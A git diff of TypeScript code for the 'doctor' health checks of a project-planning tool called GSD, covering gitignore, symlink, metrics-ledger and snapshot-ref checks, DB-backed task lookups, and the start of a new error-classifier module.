unitId: "project", + message: `${missing.length} critical GSD runtime pattern(s) missing from .gitignore: ${missing.join(", ")}`, + file: ".gitignore", + fixable: true, + }); + + if (shouldFix("gitignore_missing_patterns")) { + ensureGitignore(basePath); + fixesApplied.push("added missing GSD runtime patterns to .gitignore"); + } + } + } + } + } catch { + // Non-fatal — gitignore check failed + } + + // ── External state symlink health ────────────────────────────────────── + try { + const localGsd = join(basePath, ".gsd"); + if (existsSync(localGsd)) { + const stat = lstatSync(localGsd); + + // Check for .gsd.migrating (failed migration) + const migratingPath = join(basePath, ".gsd.migrating"); + if (existsSync(migratingPath)) { + issues.push({ + severity: "error", + code: "failed_migration", + scope: "project", + unitId: "project", + message: "Found .gsd.migrating — a previous external state migration failed. State may be incomplete.", + file: ".gsd.migrating", + fixable: true, + }); + + if (shouldFix("failed_migration")) { + if (recoverFailedMigration(basePath)) { + fixesApplied.push("recovered failed migration (.gsd.migrating → .gsd)"); + } + } + } + + // Check symlink target exists + if (stat.isSymbolicLink()) { + try { + realpathSync(localGsd); + } catch { + issues.push({ + severity: "error", + code: "broken_symlink", + scope: "project", + unitId: "project", + message: ".gsd symlink target does not exist. External state directory may have been deleted.", + file: ".gsd", + fixable: false, + }); + } + } + } + } catch { + // Non-fatal — external state check failed + } + + // ── Numbered .gsd collision variants (#2205) ─────────────────────────── + // macOS APFS can create ".gsd 2", ".gsd 3" etc. when a directory blocks + // symlink creation. These must be removed so the canonical .gsd is used. + try { + const variantPattern = /^\.gsd \d+$/; + const entries = readdirSync(basePath); + const variants = entries.filter(e => variantPattern.test(e)); + if (variants.length > 0) { + for (const v of variants) { + issues.push({ + severity: "warning", + code: "numbered_gsd_variant", + scope: "project", + unitId: "project", + message: `Found macOS collision variant "${v}" — this can cause GSD state to appear deleted.`, + file: v, + fixable: true, + }); + } + + if (shouldFix("numbered_gsd_variant")) { + const removed = cleanNumberedGsdVariants(basePath); + for (const name of removed) { + fixesApplied.push(`removed numbered .gsd variant: ${name}`); + } + } + } + } catch { + // Non-fatal — variant check failed + } + + // ── Metrics ledger integrity ─────────────────────────────────────────── + try { + const metricsPath = join(root, "metrics.json"); + if (existsSync(metricsPath)) { + try { + const raw = readFileSync(metricsPath, "utf-8"); + const ledger = JSON.parse(raw); + if (ledger.version !== 1 || !Array.isArray(ledger.units)) { + issues.push({ + severity: "warning", + code: "metrics_ledger_corrupt", + scope: "project", + unitId: "project", + message: "metrics.json has an unexpected structure (version !== 1 or units is not an array) — metrics data may be unreliable", + file: ".gsd/metrics.json", + fixable: false, + }); + } + } catch { + issues.push({ + severity: "warning", + code: "metrics_ledger_corrupt", + scope: "project", + unitId: "project", + message: "metrics.json is not valid JSON — metrics data may be corrupt", + file: ".gsd/metrics.json", + fixable: false, + }); + } + } + } catch { + // Non-fatal — metrics check failed + } + + // ── Metrics ledger bloat ────────────────────────────────────────────── + // The metrics ledger has no TTL and grows by one entry per completed unit. + // At 50 units/day a project can accumulate tens of thousands of entries over + // months of use. Prune to the newest 1500 when the threshold is exceeded. + try { + const metricsFilePath = join(root, "metrics.json"); + if (existsSync(metricsFilePath)) { + try { + const raw = readFileSync(metricsFilePath, "utf-8"); + const parsed = JSON.parse(raw); + const BLOAT_UNITS_THRESHOLD = 2000; + if (parsed.version === 1 && Array.isArray(parsed.units) && parsed.units.length > BLOAT_UNITS_THRESHOLD) { + const fileSizeMB = (statSync(metricsFilePath).size / (1024 * 1024)).toFixed(1); + issues.push({ + severity: "warning", + code: "metrics_ledger_bloat", + scope: "project", + unitId: "project", + message: `metrics.json has ${parsed.units.length} unit entries (${fileSizeMB}MB) — threshold is ${BLOAT_UNITS_THRESHOLD}. Run /gsd doctor --fix to prune to the newest 1500 entries.`, + file: ".gsd/metrics.json", + fixable: true, + }); + if (shouldFix("metrics_ledger_bloat")) { + const { pruneMetricsLedger } = await import("./metrics.js"); + const removed = pruneMetricsLedger(basePath, 1500); + fixesApplied.push(`pruned metrics ledger: removed ${removed} oldest entries (${parsed.units.length - removed} remain)`); + } + } + } catch { + // JSON parse failed — already handled by the integrity check above + } + } + } catch { + // Non-fatal — metrics bloat check failed + } + + // ── Large planning file detection ────────────────────────────────────── + // Files over 100KB can cause LLM context pressure. Report the worst offenders. + try { + const MAX_FILE_BYTES = 100 * 1024; // 100KB + const milestonesPath = milestonesDir(basePath); + if (existsSync(milestonesPath)) { + const largeFiles: Array<{ path: string; sizeKB: number }> = []; + function scanForLargeFiles(dir: string, depth = 0): void { + if (depth > 6) return; + try { + for (const entry of readdirSync(dir)) { + const full = join(dir, entry); + try { + const s = statSync(full); + if (s.isDirectory()) { scanForLargeFiles(full, depth + 1); continue; } + if (entry.endsWith(".md") && s.size > MAX_FILE_BYTES) { + largeFiles.push({ path: full.replace(basePath + "/", ""), sizeKB: Math.round(s.size / 1024) }); + } + } catch { /* skip entry */ } + } + } catch { /* skip dir */ } + } + scanForLargeFiles(milestonesPath); + if (largeFiles.length > 0) { + largeFiles.sort((a, b) => b.sizeKB - a.sizeKB); + const worst = largeFiles[0]!; + issues.push({ + severity: "warning", + code: "large_planning_file", + scope: "project", + unitId: "project", + message: `${largeFiles.length} planning file(s) exceed 100KB — largest: ${worst.path} (${worst.sizeKB}KB). Large files cause LLM context pressure.`, + file: worst.path, + fixable: false, + }); + } + } + } catch { + // Non-fatal — large file scan failed + } + + // ── Snapshot ref bloat ──────────────────────────────────────────────── + // refs/gsd/snapshots/ accumulate over time. Prune to newest 5 per label + // when total count exceeds threshold. + try { + if (nativeIsRepo(basePath)) { + const refs = nativeForEachRef(basePath, "refs/gsd/snapshots/"); + if (refs.length > 50) { + issues.push({ + severity: "warning", + code: "snapshot_ref_bloat", + scope: "project", + unitId: "project", + message: `${refs.length} snapshot refs found under refs/gsd/snapshots/ — pruning to newest 5 per label will reclaim git storage`, + fixable: true, + }); + + if (shouldFix("snapshot_ref_bloat")) { + const byLabel = new Map(); + for (const ref of refs) { + const parts = ref.split("/"); + const label = parts.slice(0, -1).join("/"); + if (!byLabel.has(label)) byLabel.set(label, []); + byLabel.get(label)!.push(ref); + } + let pruned = 0; + for (const [, labelRefs] of byLabel) { + const sorted = labelRefs.sort(); + for (const old of sorted.slice(0, -5)) { + try { + nativeUpdateRef(basePath, old); + pruned++; + } catch { /* skip */ } + } + } + if (pruned > 0) { + fixesApplied.push(`pruned ${pruned} old snapshot ref(s)`); + } + } + } + } + } catch { + // Non-fatal — snapshot ref check failed + } +} + +/** + * Build STATE.md markdown content from derived state. + * Local helper used by checkRuntimeHealth for STATE.md drift detection and repair. + */ +function buildStateMarkdownForCheck(state: Awaited>): string { + const lines: string[] = []; + lines.push("# GSD State", ""); + + const activeMilestone = state.activeMilestone + ? `${state.activeMilestone.id}: ${state.activeMilestone.title}` + : "None"; + const activeSlice = state.activeSlice + ? `${state.activeSlice.id}: ${state.activeSlice.title}` + : "None"; + + lines.push(`**Active Milestone:** ${activeMilestone}`); + lines.push(`**Active Slice:** ${activeSlice}`); + lines.push(`**Phase:** ${state.phase}`); + if (state.requirements) { + lines.push(`**Requirements Status:** ${state.requirements.active} active · ${state.requirements.validated} validated · ${state.requirements.deferred} deferred · ${state.requirements.outOfScope} out of scope`); + } + lines.push(""); + lines.push("## Milestone Registry"); + + for (const entry of state.registry) { + const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C"; + lines.push(`- ${glyph} **${entry.id}:** ${entry.title}`); + } + + lines.push(""); + lines.push("## Recent Decisions"); + if (state.recentDecisions.length > 0) { + for (const decision of state.recentDecisions) lines.push(`- ${decision}`); + } else { + lines.push("- None recorded"); + } + + lines.push(""); + lines.push("## Blockers"); + if (state.blockers.length > 0) { + for (const blocker of state.blockers) lines.push(`- ${blocker}`); + } else { + lines.push("- None"); + } + + lines.push(""); + lines.push("## Next Action"); + lines.push(state.nextAction || "None"); + lines.push(""); + + return lines.join("\n"); +} diff --git a/src/resources/extensions/gsd/doctor-types.ts b/src/resources/extensions/gsd/doctor-types.ts index 29bce4f7b..8c804b3b8 100644 --- a/src/resources/extensions/gsd/doctor-types.ts +++ b/src/resources/extensions/gsd/doctor-types.ts @@ -3,13 +3,6 @@ export type DoctorIssueCode = | "invalid_preferences" | "missing_tasks_dir" | "missing_slice_plan" - | "task_done_missing_summary" - | "task_summary_without_done_checkbox" - | "all_tasks_done_missing_slice_summary" - | "all_tasks_done_missing_slice_uat" - | "all_tasks_done_roadmap_not_checked" - | "slice_checked_missing_summary" - | "slice_checked_missing_uat" | "all_slices_done_missing_milestone_validation" | "all_slices_done_missing_milestone_summary" | "task_done_must_haves_not_verified" @@ -33,6 +26,7 @@ export type DoctorIssueCode = | "unresolvable_dependency" | "failed_migration" | "broken_symlink" + | "numbered_gsd_variant" // Environment health checks (#1221) | "env_node_version" | "env_dependencies" @@ -67,6 +61,8 @@ export type DoctorIssueCode = | "worktree_stale" | "worktree_dirty" | "worktree_unpushed" + // Stale commit safety check + | "stale_uncommitted_changes" // Snapshot ref bloat | "snapshot_ref_bloat" // Runtime data integrity @@ -76,23 +72,13 @@ export type DoctorIssueCode = | "large_planning_file" // Slow environment checks (opt-in via --build / --test flags) | "env_build" - | "env_test"; - -/** - * Issue codes that represent expected completion-transition states. - * These are detected by the doctor but should NOT be auto-fixed at task level — - * they are resolved by the complete-slice/complete-milestone dispatch units. - * Consumers (e.g. auto-post-unit health tracking) should exclude these from - * error counts when running at task fixLevel to avoid false escalation. - * - * Only the slice summary is deferred here because it requires LLM-generated - * content. Roadmap checkbox and UAT stub are mechanical bookkeeping and are - * fixed immediately to avoid inconsistent state if the session stops before - * complete-slice runs (#1808). - */ -export const COMPLETION_TRANSITION_CODES = new Set([ - "all_tasks_done_missing_slice_summary", -]); + | "env_test" + // Engine health checks (Phase 4) + | "db_orphaned_task" + | "db_orphaned_slice" + | "db_done_task_no_summary" + | "db_duplicate_id" + | "projection_drift"; /** * Issue codes that represent global or completion-critical state. diff --git a/src/resources/extensions/gsd/doctor.ts b/src/resources/extensions/gsd/doctor.ts index c7daa6b47..b10362efc 100644 --- a/src/resources/extensions/gsd/doctor.ts +++ b/src/resources/extensions/gsd/doctor.ts @@ -1,16 +1,18 @@ import { existsSync, mkdirSync, lstatSync, readdirSync, readFileSync } from "node:fs"; import { join } from "node:path"; -import { loadFile, parsePlan, parseRoadmap, parseSummary, saveFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js"; +import { loadFile, parseSummary, saveFile, parseTaskPlanMustHaves, countMustHavesMentionedInSummary } from "./files.js"; +import { parseRoadmap as parseLegacyRoadmap, parsePlan as parseLegacyPlan } from "./parsers-legacy.js"; +import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js"; import { resolveMilestoneFile, resolveMilestonePath, resolveSliceFile, resolveSlicePath, resolveTaskFile, resolveTasksDir, milestonesDir, gsdRoot, relMilestoneFile, relSliceFile, relTaskFile, relSlicePath, relGsdRootFile, resolveGsdRootFile, relMilestonePath } from "./paths.js"; import { deriveState, isMilestoneComplete } from "./state.js"; import { invalidateAllCaches } from "./cache.js"; import { loadEffectiveGSDPreferences, type GSDPreferences } from "./preferences.js"; import type { DoctorIssue, DoctorIssueCode, DoctorReport } from "./doctor-types.js"; -import { COMPLETION_TRANSITION_CODES, GLOBAL_STATE_CODES } from "./doctor-types.js"; +import { GLOBAL_STATE_CODES } from "./doctor-types.js"; import type { RoadmapSliceEntry } from "./types.js"; -import { checkGitHealth, checkRuntimeHealth, checkGlobalHealth } from "./doctor-checks.js"; +import { checkGitHealth, checkRuntimeHealth, checkGlobalHealth, checkEngineHealth } from "./doctor-checks.js"; import { checkEnvironmentHealth } from "./doctor-environment.js"; import { runProviderChecks } from "./doctor-providers.js"; @@ -85,7 +87,8 @@ function validatePreferenceShape(preferences: GSDPreferences): string[] { return issues; } -function buildStateMarkdown(state: Awaited>): string { +/** Build STATE.md content from derived state. Exported for guided-flow pre-dispatch rebuild (#3475). */ +export function buildStateMarkdown(state: Awaited>): string { const lines: string[] = []; lines.push("# GSD State", ""); @@ -149,167 +152,6 @@ export async function rebuildState(basePath: string): Promise { await saveFile(path, buildStateMarkdown(state)); } -async function ensureSliceSummaryStub(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const path = join(resolveSlicePath(basePath, milestoneId, sliceId) ?? relSlicePath(basePath, milestoneId, sliceId), `${sliceId}-SUMMARY.md`); - const absolute = resolveSliceFile(basePath, milestoneId, sliceId, "SUMMARY") ?? join(resolveSlicePath(basePath, milestoneId, sliceId)!, `${sliceId}-SUMMARY.md`); - const content = [ - "---", - `id: ${sliceId}`, - `parent: ${milestoneId}`, - `milestone: ${milestoneId}`, - "provides: []", - "requires: []", - "affects: []", - "key_files: []", - "key_decisions: []", - "patterns_established: []", - "observability_surfaces:", - " - none yet \u2014 doctor created placeholder summary; replace with real diagnostics before treating as complete", - "drill_down_paths: []", - "duration: unknown", - "verification_result: unknown", - `completed_at: ${new Date().toISOString()}`, - "---", - "", - `# ${sliceId}: Recovery placeholder summary`, - "", - "**Doctor-created placeholder.**", - "", - "## What Happened", - "Doctor detected that all tasks were complete but the slice summary was missing. Replace this with a real compressed slice summary before relying on it.", - "", - "## Verification", - "Not re-run by doctor.", - "", - "## Deviations", - "Recovery placeholder created to restore required artifact shape.", - "", - "## Known Limitations", - "This file is intentionally incomplete and should be replaced by a real summary.", - "", - "## Follow-ups", - "- Regenerate this summary from task summaries.", - "", - "## Files Created/Modified", - `- \`${relSliceFile(basePath, milestoneId, sliceId, "SUMMARY")}\` \u2014 doctor-created placeholder summary`, - "", - "## Forward Intelligence", - "", - "### What the next slice should know", - "- Doctor had to reconstruct completion artifacts; inspect task summaries before continuing.", - "", - "### What's fragile", - "- Placeholder summary exists solely to unblock invariant checks.", - "", - "### Authoritative diagnostics", - "- Task summaries in the slice tasks/ directory \u2014 they are the actual authoritative source until this summary is rewritten.", - "", - "### What assumptions changed", - "- The system assumed completion would always write a slice summary; in practice doctor may need to restore missing artifacts.", - "", - ].join("\n"); - await saveFile(absolute, content); - fixesApplied.push(`created placeholder ${absolute}`); -} - -async function ensureSliceUatStub(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const sDir = resolveSlicePath(basePath, milestoneId, sliceId); - if (!sDir) return; - const absolute = join(sDir, `${sliceId}-UAT.md`); - const content = [ - `# ${sliceId}: Recovery placeholder UAT`, - "", - `**Milestone:** ${milestoneId}`, - `**Written:** ${new Date().toISOString()}`, - "", - "## Preconditions", - "- Doctor created this placeholder because the expected UAT file was missing.", - "", - "## Smoke Test", - "- Re-run the slice verification from the slice plan before shipping.", - "", - "## Test Cases", - "### 1. Replace this placeholder", - "1. Read the slice plan and task summaries.", - "2. Write a real UAT script.", - "3. **Expected:** This placeholder is replaced with meaningful human checks.", - "", - "## Edge Cases", - "### Missing completion artifacts", - "1. Confirm the summary, roadmap checkbox, and state file are coherent.", - "2. **Expected:** GSD doctor reports no remaining completion drift for this slice.", - "", - "## Failure Signals", - "- Placeholder content still present when treating the slice as done", - "", - "## Notes for Tester", - "Doctor created this file only to restore the required artifact shape. Replace it with a real UAT script.", - "", - ].join("\n"); - await saveFile(absolute, content); - fixesApplied.push(`created placeholder ${absolute}`); -} - -async function markTaskDoneInPlan(basePath: string, milestoneId: string, sliceId: string, taskId: string, fixesApplied: string[]): Promise { - const planPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN"); - if (!planPath) return; - const content = await loadFile(planPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${taskId}:`, "m"), - `$1[x] **${taskId}:`, - ); - if (updated !== content) { - await saveFile(planPath, updated); - fixesApplied.push(`marked ${taskId} done in ${planPath}`); - } -} - -async function markTaskUndoneInPlan(basePath: string, milestoneId: string, sliceId: string, taskId: string, fixesApplied: string[]): Promise { - const planPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN"); - if (!planPath) return; - const content = await loadFile(planPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${taskId}:`, "mi"), - `$1[ ] **${taskId}:`, - ); - if (updated !== content) { - await saveFile(planPath, updated); - fixesApplied.push(`unchecked ${taskId} in ${planPath} (missing summary — task will re-execute)`); - } -} - -async function markSliceDoneInRoadmap(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - if (!roadmapPath) return; - const content = await loadFile(roadmapPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${sliceId}:`, "m"), - `$1[x] **${sliceId}:`, - ); - if (updated !== content) { - await saveFile(roadmapPath, updated); - fixesApplied.push(`marked ${sliceId} done in ${roadmapPath}`); - } -} - -async function markSliceUndoneInRoadmap(basePath: string, milestoneId: string, sliceId: string, fixesApplied: string[]): Promise { - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - if (!roadmapPath) return; - const content = await loadFile(roadmapPath); - if (!content) return; - const updated = content.replace( - new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${sliceId}:`, "m"), - `$1[ ] **${sliceId}:`, - ); - if (updated !== content) { - await saveFile(roadmapPath, updated); - fixesApplied.push(`unmarked ${sliceId} in ${roadmapPath} (premature completion)`); - } -} - function matchesScope(unitId: string, scope?: string): boolean { if (!scope) return true; return unitId === scope || unitId.startsWith(`${scope}/`); @@ -374,8 +216,14 @@ export async function selectDoctorScope(basePath: string, requestedScope?: strin const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP"); const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; if (!roadmapContent) continue; - const roadmap = parseRoadmap(roadmapContent); - if (!isMilestoneComplete(roadmap)) return milestone.id; + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestone.id); + const allDone = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete"); + if (!allDone) return milestone.id; + } else { + const roadmap = parseLegacyRoadmap(roadmapContent); + if (!isMilestoneComplete(roadmap)) return milestone.id; + } } return state.registry[0]?.id; @@ -490,18 +338,10 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; /** Whether a given issue code should be auto-fixed at the current fixLevel. */ const shouldFix = (code: DoctorIssueCode): boolean => { if (!fix || dryRun) return false; - if (fixLevel === "task" && COMPLETION_TRANSITION_CODES.has(code)) return false; if (fixLevel === "task" && GLOBAL_STATE_CODES.has(code)) return false; return true; }; - /** Log a dry-run "would fix" entry when fix=true but dryRun=true. */ - const dryRunCanFix = (code: DoctorIssueCode, message: string): void => { - if (dryRun && fix && !(fixLevel === "task" && COMPLETION_TRANSITION_CODES.has(code))) { - fixesApplied.push(`[dry-run] would fix: ${message}`); - } - }; - const prefs = loadEffectiveGSDPreferences(); if (prefs) { const prefIssues = validatePreferenceShape(prefs.preferences); @@ -521,8 +361,8 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; // Git health checks — timed const t0git = Date.now(); const isolationMode: "none" | "worktree" | "branch" = options?.isolationMode ?? - (prefs?.preferences?.git?.isolation === "none" ? "none" : - prefs?.preferences?.git?.isolation === "branch" ? "branch" : "worktree"); + (prefs?.preferences?.git?.isolation === "worktree" ? "worktree" : + prefs?.preferences?.git?.isolation === "branch" ? "branch" : "none"); await checkGitHealth(basePath, issues, fixesApplied, shouldFix, isolationMode); const gitMs = Date.now() - t0git; @@ -543,6 +383,9 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; }); const envMs = Date.now() - t0env; + // Engine health checks — DB constraints and projection drift + await checkEngineHealth(basePath, issues, fixesApplied); + const milestonesPath = milestonesDir(basePath); if (!existsSync(milestonesPath)) { const report: DoctorReport = { ok: issues.every(i => i.severity !== "error"), basePath, issues, fixesApplied, timing: { git: gitMs, runtime: runtimeMs, environment: envMs, gsdState: 0 } }; @@ -629,7 +472,34 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; if (!roadmapContent) continue; - const roadmap = parseRoadmap(roadmapContent); + + // Normalize slices: prefer DB, fall back to parser + type NormSlice = RoadmapSliceEntry & { pending?: boolean }; + let slices: NormSlice[]; + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestoneId); + slices = dbSlices.map(s => ({ + id: s.id, + title: s.title, + done: s.status === "complete", + pending: s.status === "pending", + risk: (s.risk || "medium") as RoadmapSliceEntry["risk"], + depends: s.depends, + demo: s.demo, + })); + } else { + const activeMilestoneId = state.activeMilestone?.id; + const activeSliceId = state.activeSlice?.id; + slices = parseLegacyRoadmap(roadmapContent).slices.map(s => ({ + ...s, + // Legacy roadmaps only encode done vs not-done. For doctor's + // missing-directory checks, treat every undone slice except the + // current active slice as effectively pending/unstarted. + pending: !s.done && (milestoneId !== activeMilestoneId || s.id !== activeSliceId), + })); + } + // Wrap in Roadmap-compatible shape for detectCircularDependencies + const roadmap = { slices }; // ── Circular dependency detection ────────────────────────────────────── for (const cycle of detectCircularDependencies(roadmap.slices)) { @@ -707,6 +577,9 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const slicePath = resolveSlicePath(basePath, milestoneId, slice.id); if (!slicePath) { + // Pending slices haven't been planned yet — directories are created + // lazily by ensurePreconditions() at dispatch time. Skip them. + if (slice.pending) continue; const expectedPath = relSlicePath(basePath, milestoneId, slice.id); issues.push({ severity: slice.done ? "warning" : "error", @@ -729,6 +602,8 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const tasksDir = resolveTasksDir(basePath, milestoneId, slice.id); if (!tasksDir) { + // Pending slices haven't been planned yet — tasks/ is created on demand. + if (slice.pending) continue; issues.push({ severity: slice.done ? "warning" : "error", code: "missing_tasks_dir", @@ -748,7 +623,17 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; const planPath = resolveSliceFile(basePath, milestoneId, slice.id, "PLAN"); const planContent = planPath ? await loadFile(planPath) : null; - const plan = planContent ? parsePlan(planContent) : null; + // Normalize plan tasks: prefer DB, fall back to parsers-legacy + let plan: { tasks: Array<{ id: string; done: boolean; title: string; estimate?: string }> } | null = null; + if (isDbAvailable()) { + const dbTasks = getSliceTasks(milestoneId, slice.id); + if (dbTasks.length > 0) { + plan = { tasks: dbTasks.map(t => ({ id: t.id, done: t.status === "complete" || t.status === "done", title: t.title, estimate: t.estimate || undefined })) }; + } + } + if (!plan && planContent) { + plan = parseLegacyPlan(planContent); + } if (!plan) { if (!slice.done) { issues.push({ @@ -792,42 +677,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; } catch { /* non-fatal */ } let allTasksDone = plan.tasks.length > 0; - let taskUncheckedByDoctor = false; for (const task of plan.tasks) { const taskUnitId = `${unitId}/${task.id}`; const summaryPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "SUMMARY"); const hasSummary = !!(summaryPath && await loadFile(summaryPath)); - if (task.done && !hasSummary) { - issues.push({ - severity: "error", - code: "task_done_missing_summary", - scope: "task", - unitId: taskUnitId, - message: `Task ${task.id} is marked done but summary is missing — unchecking so it re-executes`, - file: relSliceFile(basePath, milestoneId, slice.id, "PLAN"), - fixable: true, - }); - dryRunCanFix("task_done_missing_summary", `uncheck ${task.id} in plan for ${taskUnitId}`); - if (shouldFix("task_done_missing_summary")) { - await markTaskUndoneInPlan(basePath, milestoneId, slice.id, task.id, fixesApplied); - taskUncheckedByDoctor = true; - } - } - - if (!task.done && hasSummary) { - issues.push({ - severity: "warning", - code: "task_summary_without_done_checkbox", - scope: "task", - unitId: taskUnitId, - message: `Task ${task.id} has a summary but is not marked done in the slice plan`, - file: relSliceFile(basePath, milestoneId, slice.id, "PLAN"), - fixable: true, - }); - if (fix) await markTaskDoneInPlan(basePath, milestoneId, slice.id, task.id, fixesApplied); - } - // Must-have verification if (task.done && hasSummary) { const taskPlanPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "PLAN"); @@ -875,18 +729,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; allTasksDone = allTasksDone && task.done; } - // ── #1850: cascade slice uncheck when task_done_missing_summary fires ── - // When doctor unchecks tasks inside a done slice, the slice must also be - // unchecked so the state machine re-enters the executing phase. Without - // this, state.ts skips done slices and the unchecked tasks never run, - // causing doctor to fire again on every start (infinite loop). - if (taskUncheckedByDoctor && slice.done) { - await markSliceUndoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied); - } - // Blocker-without-replan detection + // Skip when all tasks are done — the blocker was implicitly resolved + // within the task and the slice is not stuck (#3105 Bug 2). const replanPath = resolveSliceFile(basePath, milestoneId, slice.id, "REPLAN"); - if (!replanPath) { + if (!replanPath && !allTasksDone) { for (const task of plan.tasks) { if (!task.done) continue; const summaryPath = resolveTaskFile(basePath, milestoneId, slice.id, task.id, "SUMMARY"); @@ -916,88 +763,11 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; file: relSliceFile(basePath, milestoneId, slice.id, "REPLAN"), fixable: false }); } - const sliceSummaryPath = resolveSliceFile(basePath, milestoneId, slice.id, "SUMMARY"); - const sliceUatPath = join(slicePath, `${slice.id}-UAT.md`); - const hasSliceSummary = !!(sliceSummaryPath && await loadFile(sliceSummaryPath)); - const hasSliceUat = existsSync(sliceUatPath); - - if (allTasksDone && !hasSliceSummary) { - issues.push({ - severity: "error", - code: "all_tasks_done_missing_slice_summary", - scope: "slice", - unitId, - message: `All tasks are done but ${slice.id}-SUMMARY.md is missing`, - file: relSliceFile(basePath, milestoneId, slice.id, "SUMMARY"), - fixable: true, - }); - dryRunCanFix("all_tasks_done_missing_slice_summary", `create placeholder summary for ${unitId}`); - if (shouldFix("all_tasks_done_missing_slice_summary")) await ensureSliceSummaryStub(basePath, milestoneId, slice.id, fixesApplied); - } - - if (allTasksDone && !hasSliceUat) { - issues.push({ - severity: "warning", - code: "all_tasks_done_missing_slice_uat", - scope: "slice", - unitId, - message: `All tasks are done but ${slice.id}-UAT.md is missing`, - file: `${relSlicePath(basePath, milestoneId, slice.id)}/${slice.id}-UAT.md`, - fixable: true, - }); - dryRunCanFix("all_tasks_done_missing_slice_uat", `create placeholder UAT for ${unitId}`); - if (shouldFix("all_tasks_done_missing_slice_uat")) await ensureSliceUatStub(basePath, milestoneId, slice.id, fixesApplied); - } - - if (allTasksDone && !slice.done) { - issues.push({ - severity: "error", - code: "all_tasks_done_roadmap_not_checked", - scope: "slice", - unitId, - message: `All tasks are done but roadmap still shows ${slice.id} as incomplete`, - file: relMilestoneFile(basePath, milestoneId, "ROADMAP"), - fixable: true, - }); - dryRunCanFix("all_tasks_done_roadmap_not_checked", `mark ${slice.id} done in roadmap`); - if (shouldFix("all_tasks_done_roadmap_not_checked") && (hasSliceSummary || existsSync(join(slicePath, `${slice.id}-SUMMARY.md`)))) { - await markSliceDoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied); - } - } - - if (slice.done && !hasSliceSummary) { - issues.push({ - severity: "error", - code: "slice_checked_missing_summary", - scope: "slice", - unitId, - message: `Roadmap marks ${slice.id} complete but slice summary is missing`, - file: relSliceFile(basePath, milestoneId, slice.id, "SUMMARY"), - fixable: true, - }); - if (!allTasksDone) { - dryRunCanFix("slice_checked_missing_summary", `uncheck ${slice.id} in roadmap (tasks incomplete)`); - if (shouldFix("slice_checked_missing_summary")) { - await markSliceUndoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied); - } - } - } - - if (slice.done && !hasSliceUat) { - issues.push({ - severity: "warning", - code: "slice_checked_missing_uat", - scope: "slice", - unitId, - message: `Roadmap marks ${slice.id} complete but UAT file is missing`, - file: `${relSlicePath(basePath, milestoneId, slice.id)}/${slice.id}-UAT.md`, - fixable: true, - }); - } } // Milestone-level check: all slices done but no validation file - if (isMilestoneComplete(roadmap) && !resolveMilestoneFile(basePath, milestoneId, "VALIDATION") && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { + const milestoneComplete = roadmap.slices.length > 0 && roadmap.slices.every(s => s.done); + if (milestoneComplete && !resolveMilestoneFile(basePath, milestoneId, "VALIDATION") && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { issues.push({ severity: "info", code: "all_slices_done_missing_milestone_validation", @@ -1010,7 +780,7 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean; } // Milestone-level check: all slices done but no milestone summary - if (isMilestoneComplete(roadmap) && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { + if (milestoneComplete && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) { issues.push({ severity: "warning", code: "all_slices_done_missing_milestone_summary", diff --git a/src/resources/extensions/gsd/error-classifier.ts b/src/resources/extensions/gsd/error-classifier.ts new file mode 100644 index 000000000..604167451 --- /dev/null +++ b/src/resources/extensions/gsd/error-classifier.ts @@ -0,0 +1,141 @@ +/** + * Unified error classifier for provider/network/server errors. + * + * Consolidates patterns from: + * - isTransientNetworkError() in preferences-models.ts + * - classifyProviderError() in provider-error-pause.ts + * + * Single entry point: classifyError(errorMsg, retryAfterMs?) + * + * @see https://github.com/gsd-build/gsd/issues/2577 + */ + +// ── ErrorClass discriminated union ────────────────────────────────────────── + +export type ErrorClass = + | { kind: "network"; retryAfterMs: number } + | { kind: "rate-limit"; retryAfterMs: number } + | { kind: "server"; retryAfterMs: number } + | { kind: "stream"; retryAfterMs: number } + | { kind: "connection"; retryAfterMs: number } + | { kind: "model-error" } + | { kind: 